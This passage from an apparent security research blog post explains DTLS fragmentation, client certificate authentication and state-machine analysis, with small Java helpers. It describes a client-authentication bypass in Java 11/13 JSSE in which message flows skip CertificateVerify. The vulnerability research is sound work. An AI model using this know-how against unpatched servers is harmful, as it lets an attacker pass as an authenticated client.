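The bookkeeping for refragmented, partially overlapping retransmissions can be sketched with a bit set over the message body. `HandshakeReassembler` is a hypothetical helper that makes two simplifying assumptions: the total message length is already known from the handshake header, and overlapping bytes are simply overwritten instead of being checked for consistency, as a stricter implementation might do.

```java
import java.util.Arrays;
import java.util.BitSet;

/** Hypothetical reassembly buffer for one DTLS handshake message. */
final class HandshakeReassembler {
    private final byte[] body;
    private final BitSet received;

    HandshakeReassembler(int messageLength) {
        body = new byte[messageLength];
        received = new BitSet(messageLength);
    }

    /** Stores one fragment; overlapping retransmissions just overwrite bytes we may already have. */
    void addFragment(int fragmentOffset, byte[] fragment) {
        int end = fragmentOffset + fragment.length;
        if (fragmentOffset < 0 || end > body.length) {
            throw new IllegalArgumentException("fragment outside message bounds");
        }
        System.arraycopy(fragment, 0, body, fragmentOffset, fragment.length);
        received.set(fragmentOffset, end);
    }

    boolean isComplete() {
        return received.cardinality() == body.length;
    }

    /** Offset of the first missing byte, or -1 if the message is complete. */
    int firstGap() {
        int i = received.nextClearBit(0);
        return i < body.length ? i : -1;
    }

    byte[] message() {
        if (!isComplete()) {
            throw new IllegalStateException("message still has gaps");
        }
        return Arrays.copyOf(body, body.length);
    }
}
```

As long as `isComplete()` is false, the only thing a receiver can do is keep buffering and, on timeout, retransmit its previous flight.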

As you can see, all this record sequence, message sequence, second layer of fragmentation and retransmission machinery in DTLS (I didn't even mention epoch numbers) complicates the protocol a lot. Imagine being a developer who has to implement all of this correctly and securely... This might also be one reason why the scientific research community often does not scrutinize DTLS as closely as TLS. It gets really annoying really fast...

Client Authentication

In most deployments of TLS, only the server authenticates itself. It usually does this by sending an X.509 certificate to the client and then proving that it actually possesses the private key for the certificate. In the case of RSA key exchange, this is done implicitly by the ability to compute the shared secret (the premaster secret); in the case of (EC)DHE, this is done by signing the server's ephemeral public key. The X.509 certificate is transmitted in plaintext and is not confidential. The client usually does not authenticate itself within the TLS handshake, but rather in the application layer (for example, by transmitting a username and password over HTTP). However, TLS also offers the possibility of client authentication during the TLS handshake. In this case, the server sends a CertificateRequest message during its first flight. The client is then supposed to present its X.509 certificate, followed by its ClientKeyExchange message (containing either the encrypted premaster secret or its ephemeral public key). After that, the client also has to prove to the server that it possesses the private key for the transmitted certificate, as the certificate is not confidential and could be copied by a malicious actor. The client does this by sending a CertificateVerify message, which contains a signature over the handshake transcript up to this point, created with the private key that belongs to the client's certificate. The handshake then proceeds as usual with a ChangeCipherSpec message (which tells the other party that upcoming messages will be encrypted under the negotiated keys), followed by a Finished message, which assures that the handshake has not been tampered with. The server also sends its own ChangeCipherSpec (CCS) and Finished messages, after which the handshake is complete and both parties can exchange application data. The same mechanism is also present in DTLS. But what should a client do if it does not possess a certificate?
According to the RFC, the client is then supposed to send an empty Certificate message and skip the CertificateVerify message (as it has no key to sign anything with). It is then up to the TLS server to decide what to do with the client. Some TLS servers provide different options with regard to client authentication and distinguish between REQUIRED and WANTED (and NONE). If the server is set to REQUIRED, it will not finish the TLS handshake without client authentication. In the case of WANTED, the handshake is completed and the authentication status is passed on to the application, which then has to decide how to proceed. This can be useful for showing an error that asks the user to present a certificate or insert a smart card into a reader (or the like). For the bugs presented here, we set the mode to REQUIRED.
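In JSSE, the REQUIRED and WANTED modes correspond to `setNeedClientAuth(true)` and `setWantClientAuth(true)` on an `SSLEngine` (or `SSLSocket`); calling either one overrides the previous setting. The sketch below creates a server-side DTLS engine in either mode. The class `DtlsServerEngine` is hypothetical, and it initializes the context with `init(null, null, null)` (default key and trust managers) purely so the snippet runs on its own; a real server would pass its own `KeyManager`s and `TrustManager`s.

```java
import java.security.GeneralSecurityException;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLEngine;

/** Hypothetical factory for a server-side DTLS engine with client authentication. */
final class DtlsServerEngine {
    static SSLEngine create(boolean required) {
        try {
            SSLContext ctx = SSLContext.getInstance("DTLS"); // available since Java 9
            ctx.init(null, null, null); // placeholder managers; not a usable server identity
            SSLEngine engine = ctx.createSSLEngine();
            engine.setUseClientMode(false);
            if (required) {
                engine.setNeedClientAuth(true); // REQUIRED: abort if the client does not authenticate
            } else {
                engine.setWantClientAuth(true); // WANTED: finish anyway, let the application decide
            }
            return engine;
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }
}
```

On the affected Java versions, the bypasses described in this post work even with `setNeedClientAuth(true)`.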

State machines

As you might have noticed, it is not trivial to decide when a client or server is allowed to receive or send each message. Some messages are optional, some are required, some messages are retransmitted, others are not. How an implementation reacts to which message at which point is captured by its state machine. Some implementations implement this state machine explicitly, while others only do so implicitly, by raising errors internally if things happen that should not happen (like setting a master_secret when a master_secret was already set for the epoch). In our research, we looked at exactly these state machines in DTLS implementations, using a grey-box approach. The details of our approach will be in our upcoming paper (which will probably get its own blog post), but basically we carefully crafted message flows and observed the behavior of each implementation to construct a Mealy machine that models how the implementation reacts to in-order and out-of-order messages. We then analyzed these Mealy machines for unexpected, unwanted or missing edges. The whole process is very similar to the work of Joeri de Ruiter and Erik Poll.

JSSE Bugs

The bugs we are presenting today were present in Java 11 and Java 13 (Oracle and OpenJDK). As far as we know, older versions were not affected. Cryptography in Java is implemented by so-called security providers. By default, SUN JCE is used to implement cryptography; however, every developer is free to write or add their own security provider and use it for their cryptographic operations. One common alternative to SUN JCE is BouncyCastle. The whole concept is very similar to OpenSSL's engine concept (if you are familiar with that). Within the JCE exists JSSE, the Java Secure Socket Extension, which is the SSL/TLS part of the JCE. The presented attacks were evaluated using SUN JSSE, i.e., the default TLS implementation in Java. JSSE implements TLS and DTLS (added in Java 9). However, DTLS is not trivial to use, as the interface is quite complex and there are not many good examples of how to use it. In the case of DTLS, only the core of the protocol is implemented; how the data is moved from A to B is left to the developer. We developed a test harness around SSLEngine.java to be able to speak DTLS with Java. The way JSSE implements its state machine is quite interesting, as it is completely different from all the other implementations we analyzed. JSSE uses a producer/consumer architecture to decide which messages to process. The code is quite complex, but worth a look if you are interested in state machines.
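The analysis step from the state machine section (looking for unwanted edges in a Mealy machine) can be illustrated on a toy model. The hypothetical `MealyMachine` class below stores transitions as (state, input) -> (next state, output) and searches breadth-first for a shortest input sequence that produces a given output without ever using a given input. It only checks a hand-written machine: learning the machine from a real implementation is not shown, and this is not a model of JSSE's producer/consumer code.

```java
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Deque;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/** Toy Mealy machine: (state, input) -> (next state, output). Hypothetical, not JSSE code. */
final class MealyMachine {
    private static final class Edge {
        final String next;
        final String output;

        Edge(String next, String output) {
            this.next = next;
            this.output = output;
        }
    }

    private final Map<String, Map<String, Edge>> edges = new HashMap<>();

    /** Adds the transition "from --input/output--> to" and returns this for chaining. */
    MealyMachine add(String from, String input, String to, String output) {
        edges.computeIfAbsent(from, k -> new HashMap<>()).put(input, new Edge(to, output));
        return this;
    }

    /**
     * Breadth-first search for a shortest input sequence from start whose last transition
     * emits goalOutput and which never uses forbiddenInput. Returns null if none exists.
     */
    List<String> pathAvoiding(String start, String forbiddenInput, String goalOutput) {
        Map<String, List<String>> pathTo = new HashMap<>();
        Deque<String> queue = new ArrayDeque<>();
        pathTo.put(start, new ArrayList<>());
        queue.add(start);
        while (!queue.isEmpty()) {
            String state = queue.poll();
            Map<String, Edge> out = edges.getOrDefault(state, Collections.emptyMap());
            for (Map.Entry<String, Edge> e : out.entrySet()) {
                if (e.getKey().equals(forbiddenInput)) {
                    continue; // only paths that skip this message are of interest
                }
                List<String> path = new ArrayList<>(pathTo.get(state));
                path.add(e.getKey());
                if (e.getValue().output.equals(goalOutput)) {
                    return path;
                }
                if (!pathTo.containsKey(e.getValue().next)) {
                    pathTo.put(e.getValue().next, path);
                    queue.add(e.getValue().next);
                }
            }
        }
        return null;
    }
}
```

For a toy server model that (wrongly) accepts a ClientKeyExchange directly after its first flight, searching for the server's "ChangeCipherSpec,Finished" output while forbidding CertificateVerify returns ClientHello, ClientKeyExchange, ChangeCipherSpec, Finished, the same flight as the first exploit above; for a model without that shortcut, it returns null.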